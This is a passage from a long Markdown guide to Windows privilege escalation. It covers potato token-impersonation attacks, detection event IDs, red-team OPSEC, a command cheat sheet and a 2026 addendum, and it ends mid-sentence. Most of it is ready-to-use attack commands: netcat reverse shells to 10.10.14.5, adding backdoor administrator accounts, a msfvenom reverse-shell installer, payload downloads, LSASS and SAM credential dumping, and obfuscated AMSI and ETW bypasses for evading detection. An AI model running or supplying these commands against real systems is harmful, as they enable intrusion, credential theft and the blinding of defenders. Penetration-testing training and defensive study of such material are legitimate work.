   1650 | CVE-2024-21338 | AppLocker Bypass | Windows 10/11 | Driver LPE |
   1651 | CVE-2024-26169 | MsiExec Elevation | Windows 10/11 | MSI LPE |
   1652 | CVE-2024-30088 | Win32k | Windows 11 | Kernel LPE |
   1653 
   1654 ### 5.1.4 Safe Exploitation Practices
   1655 
   1656 ```powershell
   1657 # Pre-exploitation checks
   1658 # 1. Verify exact Windows version
   1659 [System.Environment]::OSVersion.Version
   1660 (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").CurrentBuild
   1661 
   1662 # 2. Check if patch is installed
   1663 Get-HotFix | Where-Object {$_.HotFixID -eq "KBXXXXXXX"}
   1664 
   1665 # 3. Verify system stability
   1666 Get-WmiObject Win32_OperatingSystem | Select-Object LastBootUpTime
   1667 
   1668 # 4. Take note of current state
   1669 whoami /all > pre_exploit_state.txt
   1670 ```
   1671 
   1672 **Compilation Environment:**
   1673 - Use Visual Studio 2019/2022 matching target architecture
   1674 - Test exploits in isolated VMs first
   1675 - Keep original exploit source for reference
   1676 - Document any modifications made
   1677 
   1678 ---
   1679 
   1680 # VI. Token Manipulation & Potato Attacks
   1681 
   1682 ## 6.1 Theory of Impersonation Privileges
   1683 
   1684 ### 6.1.1 Understanding Token Impersonation
   1685 
   1686 Windows process tokens contain account security information. When a user authenticates, Windows creates a primary token containing:
   1687 - User SID
   1688 - Group SIDs
   1689 - Privileges
   1690 - Integrity level
   1691 
   1692 **Impersonation** allows a thread to assume the security context of another user's token, commonly used by services handling client requests.
   1693 
   1694 ### 6.1.2 Key Privileges for Impersonation
   1695 
   1696 | Privilege | Description | Common Holders |
   1697 |-----------|-------------|----------------|
   1698 | SeImpersonatePrivilege | Impersonate a client after authentication | IIS AppPool, SQL Server, service accounts |
   1699 | SeAssignPrimaryTokenPrivilege | Replace process-level token | Service accounts |
   1700 
   1701 **Verification:**
   1702 
   1703 ```batch
   1704 whoami /priv | findstr "Impersonate\|AssignPrimaryToken"
   1705 ```
   1706 
   1707 ### 6.1.3 Where These Privileges Appear
   1708 
   1709 - **IIS Application Pools**: Web shells often have SeImpersonate
   1710 - **MSSQL with xp_cmdshell**: SQL service accounts
   1711 - **Scheduled tasks**: Tasks running as service accounts
   1712 - **Windows services**: Custom service accounts
   1713 - **Jenkins/CI systems**: Build agents
   1714 
   1715 ## 6.2 Evolution of Potato Attacks
   1716 
   1717 ### 6.2.1 Attack Family Timeline
   1718 
   1719 | Year | Tool | Method | Windows Support |
   1720 |------|------|--------|-----------------|
   1721 | 2016 | Hot Potato | NBNS/WPAD | Legacy |
   1722 | 2016 | Rotten Potato | DCOM/NTLM | Legacy |
   1723 | 2018 | Juicy Potato | DCOM/CLSID | Pre-1809 |
   1724 | 2019 | Rogue Potato | Remote OXID | Server 2019 |
   1725 | 2020 | PrintSpoofer | Named Pipes | All modern |
   1726 | 2020 | Sweet Potato | Combo attack | All modern |
   1727 | 2021 | EfsPotato | EFS RPC | All modern |
   1728 | 2022 | LocalPotato | NTLM local relay | All modern |
   1729 | 2023 | GodPotato | Multiple methods | All modern |
   1730 | 2023 | CoercedPotato | Various coercion | All modern |
   1731 
   1732 ### 6.2.2 JuicyPotato (Legacy/Pre-Windows 10 1809)
   1733 
   1734 **Status**: ❌ Blocked on Windows 10 1809+, Server 2019+
   1735 
   1736 **Usage (Legacy Systems):**
   1737 
   1738 ```batch
   1739 :: Basic usage
   1740 JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
   1741 
   1742 :: With reverse shell
   1743 JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe" -t *
   1744 
   1745 :: Common CLSIDs
   1746 :: BITS: {4991d34b-80a1-4291-83b6-3328366b9097}
   1747 :: WMI: {F3A614DC-ABE0-11d2-A441-00C04F795683}
   1748 ```
   1749 
   1750 ### 6.2.3 PrintSpoofer (Modern Windows)
   1751 
   1752 **Status**: ✅ Works on Windows 10/11, Server 2019/2022/2025
   1753 
   1754 **Requirements**: SeImpersonatePrivilege enabled
   1755 
   1756 ```batch
   1757 :: Interactive SYSTEM shell
   1758 PrintSpoofer.exe -i -c cmd
   1759 
   1760 :: Execute specific command
   1761 PrintSpoofer.exe -c "net user backdoor Password123! /add"
   1762 
   1763 :: Reverse shell
   1764 PrintSpoofer.exe -c "c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe"
   1765 ```
   1766 
   1767 ### 6.2.4 GodPotato (Most Reliable 2023+)
   1768 
   1769 **Status**: ✅ Works on all modern Windows versions
   1770 
   1771 ```batch
   1772 :: Basic SYSTEM shell
   1773 GodPotato.exe -cmd "cmd /c whoami"
   1774 
   1775 :: Add user
   1776 GodPotato.exe -cmd "net user backdoor Password123! /add"
   1777 GodPotato.exe -cmd "net localgroup administrators backdoor /add"
   1778 
   1779 :: Reverse shell
   1780 GodPotato.exe -cmd "c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe"
   1781 ```
   1782 
   1783 ### 6.2.5 RoguePotato
   1784 
   1785 **Status**: ✅ Works on Windows Server 2019+
   1786 
   1787 **Requires**: Remote OXID resolver (attacker-controlled)
   1788 
   1789 **Setup (Attacker Machine):**
   1790 
   1791 ```bash
   1792 # Start OXID resolver
   1793 socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999
   1794 ```
   1795 
   1796 **Execution (Target):**
   1797 
   1798 ```batch
   1799 RoguePotato.exe -r ATTACKER_IP -e "cmd.exe /c whoami > c:\temp\result.txt" -l 9999
   1800 ```
   1801 
   1802 ### 6.2.6 EfsPotato
   1803 
   1804 **Status**: ✅ Works by abusing Encrypting File System (EFS)
   1805 
   1806 ```batch
   1807 EfsPotato.exe "whoami"
   1808 EfsPotato.exe "net user backdoor Password123! /add"
   1809 ```
   1810 
   1811 ### 6.2.7 LocalPotato (NTLM Local Relay)
   1812 
   1813 **Status**: ✅ Unique approach using local NTLM relay
   1814 
   1815 ```batch
   1816 # Requires specific scenario - local SMB auth
   1817 LocalPotato.exe -i c:\temp\payload.exe
   1818 ```
   1819 
   1820 ### 6.2.8 SweetPotato (Combined Approach)
   1821 
   1822 **Status**: ✅ Combines multiple potato techniques
   1823 
   1824 ```batch
   1825 SweetPotato.exe -p c:\windows\system32\cmd.exe -a "/c whoami > c:\temp\result.txt"
   1826 ```
   1827 
   1828 ## 6.3 Practical Potato Attack Workflow
   1829 
   1830 ### 6.3.1 MSSQL to SYSTEM Example
   1831 
   1832 ```bash
   1833 # Step 1: Connect to MSSQL
   1834 impacket-mssqlclient sql_dev@10.129.43.30 -windows-auth
   1835 
   1836 # Step 2: Enable xp_cmdshell
   1837 SQL> enable_xp_cmdshell
   1838 
   1839 # Step 3: Verify privileges
   1840 SQL> xp_cmdshell whoami /priv
   1841 
   1842 # Step 4: Upload tool
   1843 SQL> xp_cmdshell certutil -urlcache -f http://10.10.14.5/GodPotato.exe c:\temp\GodPotato.exe
   1844 
   1845 # Step 5: Execute
   1846 SQL> xp_cmdshell c:\temp\GodPotato.exe -cmd "cmd /c net localgroup administrators sql_dev /add"
   1847 ```
   1848 
   1849 ### 6.3.2 IIS Web Shell to SYSTEM
   1850 
   1851 ```powershell
   1852 # From web shell, check privileges
   1853 whoami /priv
   1854 
   1855 # If SeImpersonatePrivilege present, upload and execute
   1856 Invoke-WebRequest -Uri "http://10.10.14.5/PrintSpoofer.exe" -OutFile "C:\Windows\Temp\ps.exe"
   1857 C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\nc.exe 10.10.14.5 443 -e cmd.exe"
   1858 ```
   1859 
   1860 ---
   1861 
   1862 # VII. Defense & OPSEC
   1863 
   1864 ## 7.1 Blue Team Perspective: Detection Points
   1865 
   1866 ### 7.1.1 Critical Event IDs
   1867 
   1868 | Event ID | Log | Description | Detection Value |
   1869 |----------|-----|-------------|-----------------|
   1870 | 4688 | Security | Process creation | Command-line monitoring |
   1871 | 4689 | Security | Process termination | Process lifecycle |
   1872 | 4624 | Security | Successful logon | Authentication tracking |
   1873 | 4625 | Security | Failed logon | Brute force detection |
   1874 | 4672 | Security | Special privileges assigned | Privilege escalation indicator |
   1875 | 4673 | Security | Privileged service called | Sensitive operation monitoring |
   1876 | 4697 | Security | Service installed | Persistence detection |
   1877 | 4698 | Security | Scheduled task created | Persistence detection |
   1878 | 7045 | System | New service installed | Service creation |
   1879 | 1102 | Security | Audit log cleared | Anti-forensics detection |
   1880 
   1881 ### 7.1.2 Sysmon Events for Detection
   1882 
   1883 | Sysmon Event | Description | PrivEsc Detection |
   1884 |--------------|-------------|-------------------|
   1885 | Event 1 | Process creation | Tool execution, suspicious commands |
   1886 | Event 3 | Network connection | C2 communications, data exfil |
   1887 | Event 6 | Driver loaded | Vulnerable driver loading |
   1888 | Event 7 | Image loaded (DLL) | DLL hijacking detection |
   1889 | Event 10 | Process access | LSASS access, injection |
   1890 | Event 11 | File created | Tool drops, payload creation |
   1891 | Event 12/13/14 | Registry events | Service modification, persistence |
   1892 | Event 17/18 | Named pipe events | Pipe-based attacks |
   1893 | Event 25 | Process tampering | AMSI/ETW bypass attempts |
   1894 
   1895 ### 7.1.3 Common Detection Signatures
   1896 
   1897 **Service Binary Path Modification:**
   1898 ```
   1899 Event 4657 (Registry modification) on:
   1900 HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath
   1901 ```
   1902 
   1903 **Suspicious Process Relationships:**
   1904 ```
   1905 cmd.exe → net.exe (adding users)
   1906 services.exe → cmd.exe (service exploitation)
   1907 w3wp.exe → cmd.exe/powershell.exe (web shell)
   1908 sqlservr.exe → cmd.exe (xp_cmdshell)
   1909 ```
   1910 
   1911 **LSASS Access:**
   1912 ```
   1913 Sysmon Event 10 with TargetImage: lsass.exe
   1914 Access mask: 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)
   1915 ```
   1916 
   1917 ## 7.2 OPSEC Considerations for Red Team
   1918 
   1919 ### 7.2.1 Tool OPSEC Ratings
   1920 
   1921 | Tool | Detection Rate | OPSEC Recommendations |
   1922 |------|----------------|----------------------|
   1923 | WinPEAS | Very High | Never use on production |
   1924 | Mimikatz | Very High | Use only if necessary, custom compile |
   1925 | SharpUp | High | Obfuscate, rename |
   1926 | Rubeus | High | Custom compile, obfuscate |
   1927 | Manual commands | Low-Medium | Blend with legitimate admin activity |
   1928 | Living off the Land | Low | Preferred approach |
   1929 
   1930 ### 7.2.2 Evasion Techniques
   1931 
   1932 **AMSI Bypass (2025 Working Methods):**
   1933 
   1934 ```powershell
   1935 # Memory patching (basic)
   1936 $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
   1937 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null,$mem)
   1938 
   1939 # Reflection-based
   1940 [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
   1941 ```
   1942 
   1943 **ETW Bypass:**
   1944 
   1945 ```powershell
   1946 # Patch ETW
   1947 $logProvider = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance')
   1948 # Requires process handle manipulation
   1949 ```
   1950 
   1951 **Parent PID Spoofing:**
   1952 - Use tools that support PPID spoofing
   1953 - Makes malicious processes appear to have legitimate parents
   1954 
   1955 ### 7.2.3 Operational Recommendations
   1956 
   1957 1. **Time your activities**: Execute during business hours to blend with legitimate activity
   1958 2. **Use existing channels**: Leverage already-established connections
   1959 3. **Minimal footprint**: Avoid writing to disk when possible
   1960 4. **Clean up**: Remove tools and artifacts after use
   1961 5. **Log awareness**: Know what you're triggering and document for reporting
   1962 6. **Test detection**: Use isolated systems to verify tool detectability
   1963 
   1964 ---
   1965 
   1966 # VIII. The Ultimate Cheat Sheet
   1967 
   1968 ## 8.1 Initial Enumeration Commands
   1969 
   1970 ### System Information
   1971 
   1972 ```batch
   1973 :: Basic info
   1974 systeminfo
   1975 hostname
   1976 whoami /all
   1977 
   1978 :: Architecture
   1979 echo %PROCESSOR_ARCHITECTURE%
   1980 wmic os get osarchitecture
   1981 
   1982 :: Patches
   1983 wmic qfe list brief
   1984 ```
   1985 
   1986 ```powershell
   1987 Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion
   1988 Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10
   1989 ```
   1990 
   1991 ### User/Group Enumeration
   1992 
   1993 ```batch
   1994 :: Current user
   1995 whoami /priv
   1996 whoami /groups
   1997 net user %USERNAME%
   1998 
   1999 :: All users
   2000 net user
   2001 net localgroup
   2002 net localgroup Administrators
   2003 net accounts
   2004 ```
   2005 
   2006 ```powershell
   2007 Get-LocalUser | Select-Object Name, Enabled, Description
   2008 Get-LocalGroupMember -Group "Administrators"
   2009 ```
   2010 
   2011 ### Network Enumeration
   2012 
   2013 ```batch
   2014 ipconfig /all
   2015 arp -a
   2016 route print
   2017 netstat -ano
   2018 netstat -ano | findstr LISTENING
   2019 ```
   2020 
   2021 ### Process/Service Enumeration
   2022 
   2023 ```batch
   2024 tasklist /svc
   2025 sc query
   2026 wmic service get name,pathname,startmode | findstr /i "auto"
   2027 ```
   2028 
   2029 ## 8.2 Service Exploitation Commands
   2030 
   2031 ### Unquoted Service Paths
   2032 
   2033 ```batch
   2034 :: Detection
   2035 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
   2036 
   2037 :: Exploitation (place binary in hijackable path)
   2038 copy payload.exe "C:\Program Files\Vulnerable.exe"
   2039 sc stop VulnerableService
   2040 sc start VulnerableService
   2041 ```
   2042 
   2043 ### Weak Service Permissions
   2044 
   2045 ```batch
   2046 :: Detection
   2047 accesschk.exe /accepteula -uwcqv "Users" *
   2048 accesschk.exe /accepteula -uwcqv "Authenticated Users" *
   2049 
   2050 :: Exploitation
   2051 sc config VulnerableService binpath= "cmd /c net localgroup administrators YOUR_USER /add"
   2052 sc stop VulnerableService
   2053 sc start VulnerableService
   2054 ```
   2055 
   2056 ### Weak Binary Permissions
   2057 
   2058 ```batch
   2059 :: Detection
   2060 icacls "C:\Path\To\service.exe"
   2061 accesschk.exe /accepteula -quvw "C:\Path\To\service.exe"
   2062 
   2063 :: Exploitation
   2064 copy /Y payload.exe "C:\Path\To\service.exe"
   2065 sc stop VulnerableService
   2066 sc start VulnerableService
   2067 ```
   2068 
   2069 ## 8.3 Registry Exploitation
   2070 
   2071 ### AlwaysInstallElevated
   2072 
   2073 ```batch
   2074 :: Detection
   2075 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   2076 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   2077 
   2078 :: Exploitation
   2079 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi
   2080 msiexec /quiet /qn /i evil.msi
   2081 ```
   2082 
   2083 ## 8.4 Credential Harvesting
   2084 
   2085 ### File Searches
   2086 
   2087 ```batch
   2088 :: Password in files
   2089 findstr /si password *.txt *.xml *.ini *.config
   2090 findstr /spin "password" *.*
   2091 
   2092 :: Specific files
   2093 dir /s /b unattend.xml sysprep.xml web.config
   2094 where /R C:\ *.config
   2095 ```
   2096 
   2097 ### Windows Credentials
   2098 
   2099 ```batch
   2100 :: Credential Manager
   2101 cmdkey /list
   2102 
   2103 :: WiFi
   2104 netsh wlan show profiles
   2105 netsh wlan show profile name="ProfileName" key=clear
   2106 
   2107 :: Registry autologon
   2108 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
   2109 ```
   2110 
   2111 ### PowerShell History
   2112 
   2113 ```powershell
   2114 Get-Content (Get-PSReadLineOption).HistorySavePath
   2115 ```
   2116 
   2117 ### SAM/SYSTEM Extraction
   2118 
   2119 ```batch
   2120 :: If admin
   2121 reg save HKLM\SAM C:\temp\SAM
   2122 reg save HKLM\SYSTEM C:\temp\SYSTEM
   2123 ```
   2124 
   2125 ## 8.5 Privilege Abuse
   2126 
   2127 ### SeImpersonatePrivilege
   2128 
   2129 ```batch
   2130 :: PrintSpoofer
   2131 PrintSpoofer.exe -i -c cmd
   2132 PrintSpoofer.exe -c "nc.exe 10.10.14.5 443 -e cmd.exe"
   2133 
   2134 :: GodPotato
   2135 GodPotato.exe -cmd "cmd /c whoami"
   2136 GodPotato.exe -cmd "net localgroup administrators YOUR_USER /add"
   2137 ```
   2138 
   2139 ### SeBackupPrivilege
   2140 
   2141 ```powershell
   2142 Import-Module .\SeBackupPrivilegeUtils.dll
   2143 Import-Module .\SeBackupPrivilegeCmdLets.dll
   2144 Set-SeBackupPrivilege
   2145 Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
   2146 ```
   2147 
   2148 ### SeDebugPrivilege
   2149 
   2150 ```batch
   2151 :: LSASS dump
   2152 procdump.exe -accepteula -ma lsass.exe lsass.dmp
   2153 
   2154 :: Mimikatz
   2155 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
   2156 ```
   2157 
   2158 ### SeTakeOwnershipPrivilege
   2159 
   2160 ```batch
   2161 takeown /f "C:\Path\To\Protected\File"
   2162 icacls "C:\Path\To\Protected\File" /grant YOUR_USER:F
   2163 ```
   2164 
   2165 ## 8.6 Group Privilege Abuse
   2166 
   2167 ### Backup Operators
   2168 
   2169 ```powershell
   2170 # Enable privilege
   2171 Import-Module .\SeBackupPrivilegeUtils.dll
   2172 Import-Module .\SeBackupPrivilegeCmdLets.dll
   2173 Set-SeBackupPrivilege
   2174 
   2175 # Copy protected files
   2176 Copy-FileSeBackupPrivilege C:\Windows\System32\config\SAM C:\temp\SAM
   2177 Copy-FileSeBackupPrivilege C:\Windows\System32\config\SYSTEM C:\temp\SYSTEM
   2178 ```
   2179 
   2180 ### DnsAdmins
   2181 
   2182 ```batch
   2183 :: Generate DLL
   2184 msfvenom -p windows/x64/exec cmd='net group "domain admins" YOUR_USER /add /domain' -f dll -o adduser.dll
   2185 
   2186 :: Load DLL
   2187 dnscmd.exe /config /serverlevelplugindll C:\Path\To\adduser.dll
   2188 
   2189 :: Restart DNS
   2190 sc stop dns
   2191 sc start dns
   2192 ```
   2193 
   2194 ### Server Operators
   2195 
   2196 ```batch
   2197 :: Modify service
   2198 sc config AppReadiness binpath= "cmd /c net localgroup Administrators YOUR_USER /add"
   2199 sc stop AppReadiness
   2200 sc start AppReadiness
   2201 ```
   2202 
   2203 ### Print Operators
   2204 
   2205 ```batch
   2206 :: Load vulnerable driver
   2207 reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
   2208 reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
   2209 EnableSeLoadDriverPrivilege.exe
   2210 ExploitCapcom.exe
   2211 ```
   2212 
   2213 ## 8.7 File Transfer Methods
   2214 
   2215 ```batch
   2216 :: Certutil
   2217 certutil -urlcache -f http://10.10.14.5/file.exe C:\temp\file.exe
   2218 
   2219 :: PowerShell
   2220 powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\temp\file.exe')"
   2221 powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.5/file.exe' -OutFile 'C:\temp\file.exe'"
   2222 
   2223 :: Bitsadmin
   2224 bitsadmin /transfer job /download /priority high http://10.10.14.5/file.exe C:\temp\file.exe
   2225 
   2226 :: SMB (no HTTP needed)
   2227 copy \\10.10.14.5\share\file.exe C:\temp\file.exe
   2228 ```
   2229 
   2230 ## 8.8 Common SID Reference
   2231 
   2232 | SID | Name |
   2233 |-----|------|
   2234 | S-1-5-18 | NT AUTHORITY\SYSTEM |
   2235 | S-1-5-19 | NT AUTHORITY\LOCAL SERVICE |
   2236 | S-1-5-20 | NT AUTHORITY\NETWORK SERVICE |
   2237 | S-1-5-32-544 | BUILTIN\Administrators |
   2238 | S-1-5-32-545 | BUILTIN\Users |
   2239 | S-1-5-32-551 | BUILTIN\Backup Operators |
   2240 | S-1-5-32-555 | BUILTIN\Remote Desktop Users |
   2241 | S-1-1-0 | Everyone |
   2242 | S-1-5-11 | Authenticated Users |
   2243 
   2244 ## 8.9 CMD vs PowerShell Equivalents
   2245 
   2246 | Task | CMD | PowerShell |
   2247 |------|-----|------------|
   2248 | Current user | `whoami` | `whoami` or `[Security.Principal.WindowsIdentity]::GetCurrent().Name` |
   2249 | List files | `dir` | `Get-ChildItem` or `ls` |
   2250 | File content | `type file.txt` | `Get-Content file.txt` or `cat file.txt` |
   2251 | Search files | `dir /s /b *.txt` | `Get-ChildItem -Recurse -Include *.txt` |
   2252 | Search content | `findstr /si password *.txt` | `Select-String -Path *.txt -Pattern password` |
   2253 | Process list | `tasklist` | `Get-Process` |
   2254 | Service list | `sc query` | `Get-Service` |
   2255 | Network connections | `netstat -ano` | `Get-NetTCPConnection` |
   2256 | Environment vars | `set` | `Get-ChildItem Env:` |
   2257 | Registry query | `reg query HKLM\...` | `Get-ItemProperty "HKLM:\..."` |
   2258 
   2259 ---
   2260 
   2261 # IX. 2026 Addendum: Modern Attack Surface
   2262 
   2263 This section adds newer and less common checks that are easy to miss in a traditional service-and-token workflow. Treat version-specific techniques as hypotheses until the exact product version, patch level, permissions, and execution context have been confirmed. Use destructive primitives only in an isolated lab or when the rules of engagement explicitly allow them.
   2264 
   2265 ## 9.1 Logging and Telemetry Awareness
   2266 
   2267 Before running broad enumeration, determine what PowerShell activity and Windows events are being retained or forwarded. These controls do not create an escalation path, but they materially change the detection footprint of one.
   2268 
   2269 ### PowerShell transcription
   2270 
   2271 ```batch
   2272 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
   2273 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
   2274 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /s
   2275 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription /s
   2276 ```
   2277 
   2278 The configured output directory is commonly stored in `OutputDirectory`. Transcripts may also be placed in a centrally managed share.
   2279 
   2280 ### Module and script-block logging
   2281 
   2282 ```batch
   2283 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /s
   2284 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /s
   2285 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /s
   2286 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /s
   2287 ```
   2288 
   2289 ```powershell
   2290 Get-WinEvent -LogName 'Windows PowerShell' -MaxEvents 15
   2291 Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxEvents 20
   2292 ```
   2293 
   2294 Also check audit policy and Windows Event Forwarding:
   2295 
   2296 ```batch
   2297 auditpol /get /category:*
   2298 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
   2299 reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
   2300 ```
   2301 
   2302 ## 9.2 Update Infrastructure and Privileged Agent IPC
   2303 
   2304 ### WSUS transport and proxy configuration
   2305 
   2306 Check whether the host is directed to an internal WSUS server and whether the policy actually enables it:
   2307 
   2308 ```batch
   2309 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
   2310 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
   2311 ```
   2312 
   2313 ```powershell
   2314 Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' -Name WUServer
   2315 Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name UseWUServer
   2316 ```
   2317 
   2318 An HTTP `WUServer` value is a warning sign, not proof of exploitability. Confirm that `UseWUServer` is `1`, identify the Windows build and WSUS client behavior, and test only in an authorized environment. CVE-2020-1013 is a separate client-side local escalation condition involving user-controlled proxy and certificate trust; do not assume every HTTP WSUS deployment is vulnerable to it.
   2319 
   2320 Review user and machine proxy settings as part of the same check:
   2321 
   2322 ```batch
   2323 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
   2324 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
   2325 netsh winhttp show proxy
   2326 ```
   2327 
   2328 ### Third-party updater and localhost IPC checklist
   2329 
   2330 Enterprise agents frequently combine a privileged service, a localhost RPC/HTTP/named-pipe endpoint, and a SYSTEM update channel. For each agent:
   2331 
   2332 1. Record its product and file version.
   2333 2. Enumerate loopback listeners and named pipes.
   2334 3. Inspect enrollment, proxy, update URL, and trust-store configuration.
   2335 4. Determine whether a standard user can redirect enrollment or update traffic.
   2336 5. Verify MSI/package signature and certificate-chain validation.
   2337 6. Check whether the privileged service accepts user-controlled paths or commands.
   2338 
   2339 ```powershell
   2340 Get-NetTCPConnection -State Listen |
   2341   Where-Object { $_.LocalAddress -in '127.0.0.1','::1' } |
   2342   Sort-Object LocalPort
   2343 
   2344 Get-ChildItem \\.\pipe\
   2345 ```
   2346 
   2347 The Netskope `stAgentSvc` chain tracked as CVE-2025-0309 is a useful case study: a localhost management surface and weak update trust can turn a low-privileged foothold into SYSTEM execution. Match the installed product and version to a vendor advisory before attempting validation.
   2348 
   2349 ### Veeam Backup & Replication CVE-2023-27532
   2350 
   2351 Vulnerable Veeam Backup & Replication builds before `11.0.1.1261` may expose a privileged service on TCP 9401. Confirm both the listener and the installed file version:
   2352 
   2353 ```batch
   2354 netstat -ano | findstr ":9401"
   2355 ```
   2356 
   2357 ```powershell
   2358 (Get-Item 'C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe').VersionInfo.FileVersion
   2359 ```
   2360 
   2361 Do not infer vulnerability from an open port alone. Validate the edition, build, service owner, and vendor patch status.
   2362 
   2363 ## 9.3 Service Triggers and Indirect Starts
   2364 
   2365 A user may be unable to call `StartService` but still be able to activate a privileged service by satisfying one of its triggers, such as network availability, device arrival, an ETW event, a named pipe/RPC endpoint, domain join, or Group Policy refresh.
   2366 
   2367 ```batch
   2368 sc qtriggerinfo <service-name>
   2369 sc qc <service-name>
   2370 sc qfailure <service-name>
   2371 ```
   2372 
   2373 When a service binary, DLL, or configuration is writable but the service ACL denies `SERVICE_START`, check:
   2374 
   2375 - whether it starts automatically at boot;
   2376 - configured failure actions;
   2377 - trigger-start conditions;
   2378 - dependent services;
   2379 - application actions that activate its COM, RPC, or named-pipe endpoint.
   2380 
   2381 This matters for weak-binary and weak-registry findings: lack of direct restart rights lowers reliability, but it does not necessarily remove the escalation path.
   2382 
   2383 ## 9.4 Secure Desktop ATConfig Registry Write (RegPwn)
   2384 
   2385 CVE-2026-24291, commonly called RegPwn, abused accessibility configuration propagation during a secure-desktop transition. A user-controlled `HKCU` ATConfig value was copied by a SYSTEM process into a per-session `HKLM` key. By racing that copy and replacing the destination key with a registry symbolic link, an attacker could redirect the privileged write to another `HKLM` value.
   2386 
   2387 Relevant locations:
   2388 
   2389 ```text
   2390 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
   2391 HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\<feature>
   2392 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session<id>\ATConfig\<feature>
   2393 ```
   2394 
   2395 The public technique used an oplock on:
   2396 
   2397 ```text
   2398 C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu.xml
   2399 ```
   2400 
   2401 The resulting primitive could redirect a SYSTEM registry value write toward a service `ImagePath` or `ServiceDll`. Microsoft patched the issue in March 2026; test patch state before treating it as a candidate. Locking the workstation is part of the public trigger and is operationally conspicuous.
   2402 
   2403 ## 9.5 Process, GUI, and Memory Checks
   2404 
   2405 ### Writable process images and search paths
   2406 
   2407 Enumerate non-Microsoft process paths, owners, command lines, and directory ACLs. A writable executable is a direct replacement candidate; a writable parent directory may support DLL or module search-order hijacking.
   2408 
   2409 ```powershell
   2410 Get-CimInstance Win32_Process | ForEach-Object {
   2411   $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue
   2412   [pscustomobject]@{
   2413     Name = $_.Name
   2414     PID = $_.ProcessId
   2415     Owner = "$($owner.Domain)\$($owner.User)"
   2416     Path = $_.ExecutablePath
   2417     CommandLine = $_.CommandLine
   2418   }
   2419 } | Format-Table -AutoSize
   2420 ```
   2421 
   2422 Pay special attention to elevated Electron, CEF, Chromium, updater, tray, and service-wrapper processes. Debug ports, remote-debugging flags, extension paths, writable resources, and missing modules can create application-specific escalation paths.
   2423 
   2424 ### Insecure privileged GUI applications
   2425 
   2426 A GUI process running as SYSTEM or high integrity may expose file-open/save dialogs, help links, browsers, or child-process launch actions. Confirm the process integrity level and whether a reachable UI action can start an arbitrary executable. Modern systems close many historical chains, so reproduce the exact application flow rather than relying on legacy examples.
   2427 
   2428 ### Process memory and command-line secrets
   2429 
   2430 Look for credentials passed on command lines before considering memory dumps:
   2431 
   2432 ```powershell
   2433 Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine
   2434 ```
   2435 
   2436 An authorized administrator can capture a process with Sysinternals ProcDump for offline review:
   2437 
